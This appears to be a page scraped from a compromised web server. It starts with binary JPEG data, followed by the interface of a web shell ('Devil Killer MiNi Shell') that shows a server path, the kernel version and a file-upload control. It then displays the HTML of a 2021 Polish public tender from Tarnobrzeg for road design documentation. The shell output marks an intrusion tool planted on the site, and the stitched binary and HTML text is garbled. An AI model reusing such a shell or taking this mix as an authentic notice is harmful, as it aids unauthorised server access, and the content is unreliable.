JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210415/0003337401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00033374 z dnia 2021-04-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo - kosztorysowych wraz z nadzorem autorskim dla zadania inwestycyjnego pn.: Przebudowy i budowy dróg w Tarnobrzegu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Tarnobrzeg</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409092</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarnobrzeg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158181568</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">158231304</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@um.tarnobrzeg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.tarnobrzeg.eobip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo - kosztorysowych wraz z nadzorem autorskim dla zadania inwestycyjnego pn.: Przebudowy i budowy dróg w Tarnobrzegu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c8242908-9db0-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00033374</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006679/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Opracowanie dokumentacji projektowo - kosztorysowych wraz z nadzorem autorskim dla zadania inwestycyjnego pn.: Przebudowy i budowy dróg w Tarnobrzegu - 7 zadań</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.tarnobrzeg.eobip.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.tarnobrzeg.eobip.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcamiodbywasię przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPuhttps://epuap.gov.pl/wps/portal orazpoczty elektronicznej: zampub@um.tarnobrzeg.pl2. Wykonawcazamierzający wziąć udział wpostępowaniu o udzielenie zamówienia publicznego, musi posiadać kontona ePUAP. Wykonawcaposiadający konto na ePUAP ma dostęp do formularzy: „Formularz dozłożenia, zmiany, wycofaniaoferty lub wniosku” oraz do „Formularza do komunikacji”.3. Wymaganiatechniczne i organizacyjnewysyłania i odbierania dokumentów elektronicznych, elektronicznych kopiidokumentów i oświadczeńoraz informacji przekazywanych przy ich użyciu opisane zostały wRegulaminie korzystania z systemuminiPortal oraz Warunkach korzystania z elektronicznej platformyusług administracji publicznej(ePUAP).4. Maksymalny rozmiar plików przesyłanych za pośrednictwemdedykowanych formularzy:„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza dokomunikacji” wynosi 150MB (dotyczy MiniPortalu oraz ePUAP). 5. Za datę przekazania oferty,wniosków, zawiadomień,dokumentów elektronicznych, oświadczeń lub elektronicznych kopiidokumentów lub oświadczeń orazinnych informacji przekazywanych w postępowaniu, przyjmuje siędatę ich przekazania na ePUAP lube-mail (nie dotyczy składania ofert).6. Dane postępowanie możnawyszukać na liście wszystkichpostępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców”lub ze strony głównej z zakładkiPostępowania.7. W postępowaniu o udzielenie zamówieniakomunikacja pomiędzy Zamawiającym aWykonawcami w szczególności składanie oświadczeń,wniosków (inna niż oferta Wykonawcy izałączniki do oferty), zawiadomień oraz przekazywanieinformacji odbywa się:• 7.1. za pośrednictwemdedykowanego formularza dostępnego na ePUAP orazudostępnionego przez miniPortal (Formularzdo komunikacji),• 7.2.drogą elektroniczną na adres:zampub@um.tarnobrzeg.pl, przy czym sposóbkomunikacji wskazany w pkt 7.2 SWZ nie jest właściwydla oferty oraz dokumentów składanych wraz zofertą (wymagających szyfrowania), które należyOgłoszenie nr 2021/BZP 00025975/01 z dnia 2021-03-312021-03-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługiskładać wyłącznie w sposób wskazany w pkt 7.1 SWZ. 8. Dokumenty elektroniczne składane są przezWykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszczarównież możliwość składania dokumentówelektronicznych za pomocą poczty elektronicznej, nawskazany w pkt 7.2 SWZ adres email (zawyjątkiem oferty i dokumentów składanych wraz z ofertą,które powinny być złożone w sposóbokreślony w pkt 7.1 SWZ). Sposób sporządzenia dokumentówelektronicznych, musi być zgody zwymaganiami określonymi w Rozporządzeniu Prezesa RadyMinistrów z dnia 30 grudnia 2020r. wsprawie sposobu sporządzania i przekazywania informacji orazwymagań technicznych dladokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o udzieleniezamówienia publicznego lub konkursie. (Dz. U. z 2020 poz. 2452) orazrozporządzeniu MinistraRozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawiepodmiotowych środków dowodowychoraz innych dokumentów lub oświadczeń, jakich może żądaćzamawiający od wykonawcy (Dz. U. z2020 poz. 2415).9. Zamawiający nie przewiduje sposobukomunikowania się z Wykonawcami w innysposób niż przy użyciu środków komunikacji elektronicznej,wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://www.tarnobrzeg.eobip.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula została określona w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula została określona w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-I.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzoremautorskimdla zadania inwestycyjnego pn.: Budowa ciągu pieszo-rowerowego wzdłuż ulicy Litewskiej wrazz oświetleniem.Zakres:- branża drogowa: budowa ciągu pieszo-rowerowego wzdłuż ulicyLitewskiej od skrzyżowaniaz ul. Warszawską do wjazdu na cmentarz komunalny w Sobowie,wykonanie sygnalizacji świetlnej na skrzyżowaniu ulic Litewska i Warszawska,- branżasanitarna: odwodnienie,- branża elektryczna: oświetlenie drogowe,- branża teletechniczna:wykonanie kanału technologicznego (w razie potrzeby),- wykonanie stałej organizacji ruchu,-inwentaryzacja drzew do wycinki wraz z nasadzeniami zastępczymi (w razie potrzeby),-elementy małej architektury - kosze na śmieci, ławki, stojaki na rowery, wiaty przystankowe itp.(w razie potrzeby w uzgodnieniu z Zamawiającym),- wykonanie podziałów pod pas drogowyniezbędnych do uzyskania normatywnych szerokości ciągu rowerowego i chodnikaprzygotowaniemwniosku o wydanie decyzji ZRID. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">126 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlegaodrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach kryteriów ustalonych wSWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania kocepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlegaodrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach kryteriów ustalonych wSWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzorem autorskimdla zadania inwestycyjnego pn.: Przebudowa ul. Garażowej w Tarnobrzegu:Zakres opracowaniaobejmuje zarówno pas drogowy ul. Garażowej jak i drogę wewnętrzną boczną od ul. Garażowej,działka ewid. nr 1446/75, obręb Tarnobrzeg:- branża drogowa: jezdnia, chodniki, parkingibranżasanitarna: odwodnienie, kanalizacja deszczowa,- branża elektryczna: oświetleniedrogowe,- branża teletechniczna: wykonanie kanału technologicznego (w razie potrzeby),-wykonanie stałej organizacji ruchu.- inwentaryzacja drzew do wycinki wraz z nasadzeniamizastępczymi (w razie potrzeby),(Uwaga! W kosztorysie będzie należało uwzględnić podziałzakresu zadania na etapy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzoremautorskimdla zadania inwestycyjnego pn.: ,,Budowa ciągu pieszo-jezdnego od ul. Żeglarskiej doMariny”.Zakres:- branża drogowa: budowa ciągu pieszo-jezdnego od wjazdu na budynek Marinyw kierunku ul. Żeglarskiej zgodnie z załączoną mapą lokalizacyjną,- branża sanitarna:odwodnienie,- branża elektryczna: oświetlenie drogowe,- wykonanie stałej organizacji ruchu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyskanajwiększą liczbę punktów przyznanych w ramach kryteriów ustalonych w SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 4. Opracowanie dokumentacji projektowo - kosztorysowej wraz z nadzoremautorskimdla zadania inwestycyjnego pn.: ,,Budowa chodnika od wjazdu do schroniska dla psów”.Zakres:-branża drogowa: budowa chodnika na ul. Turystycznej od wjazdu ulic Wisłostrada i Plażowa doschroniska dla psów na odcinku ok. 120 mb zgodnie z załączoną mapą lokalizacyjną.- branżasanitarna: odwodnienie,- wykonanie stałej organizacji ruchu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która nie podlegaodrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach kryteriów ustalonych wSWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 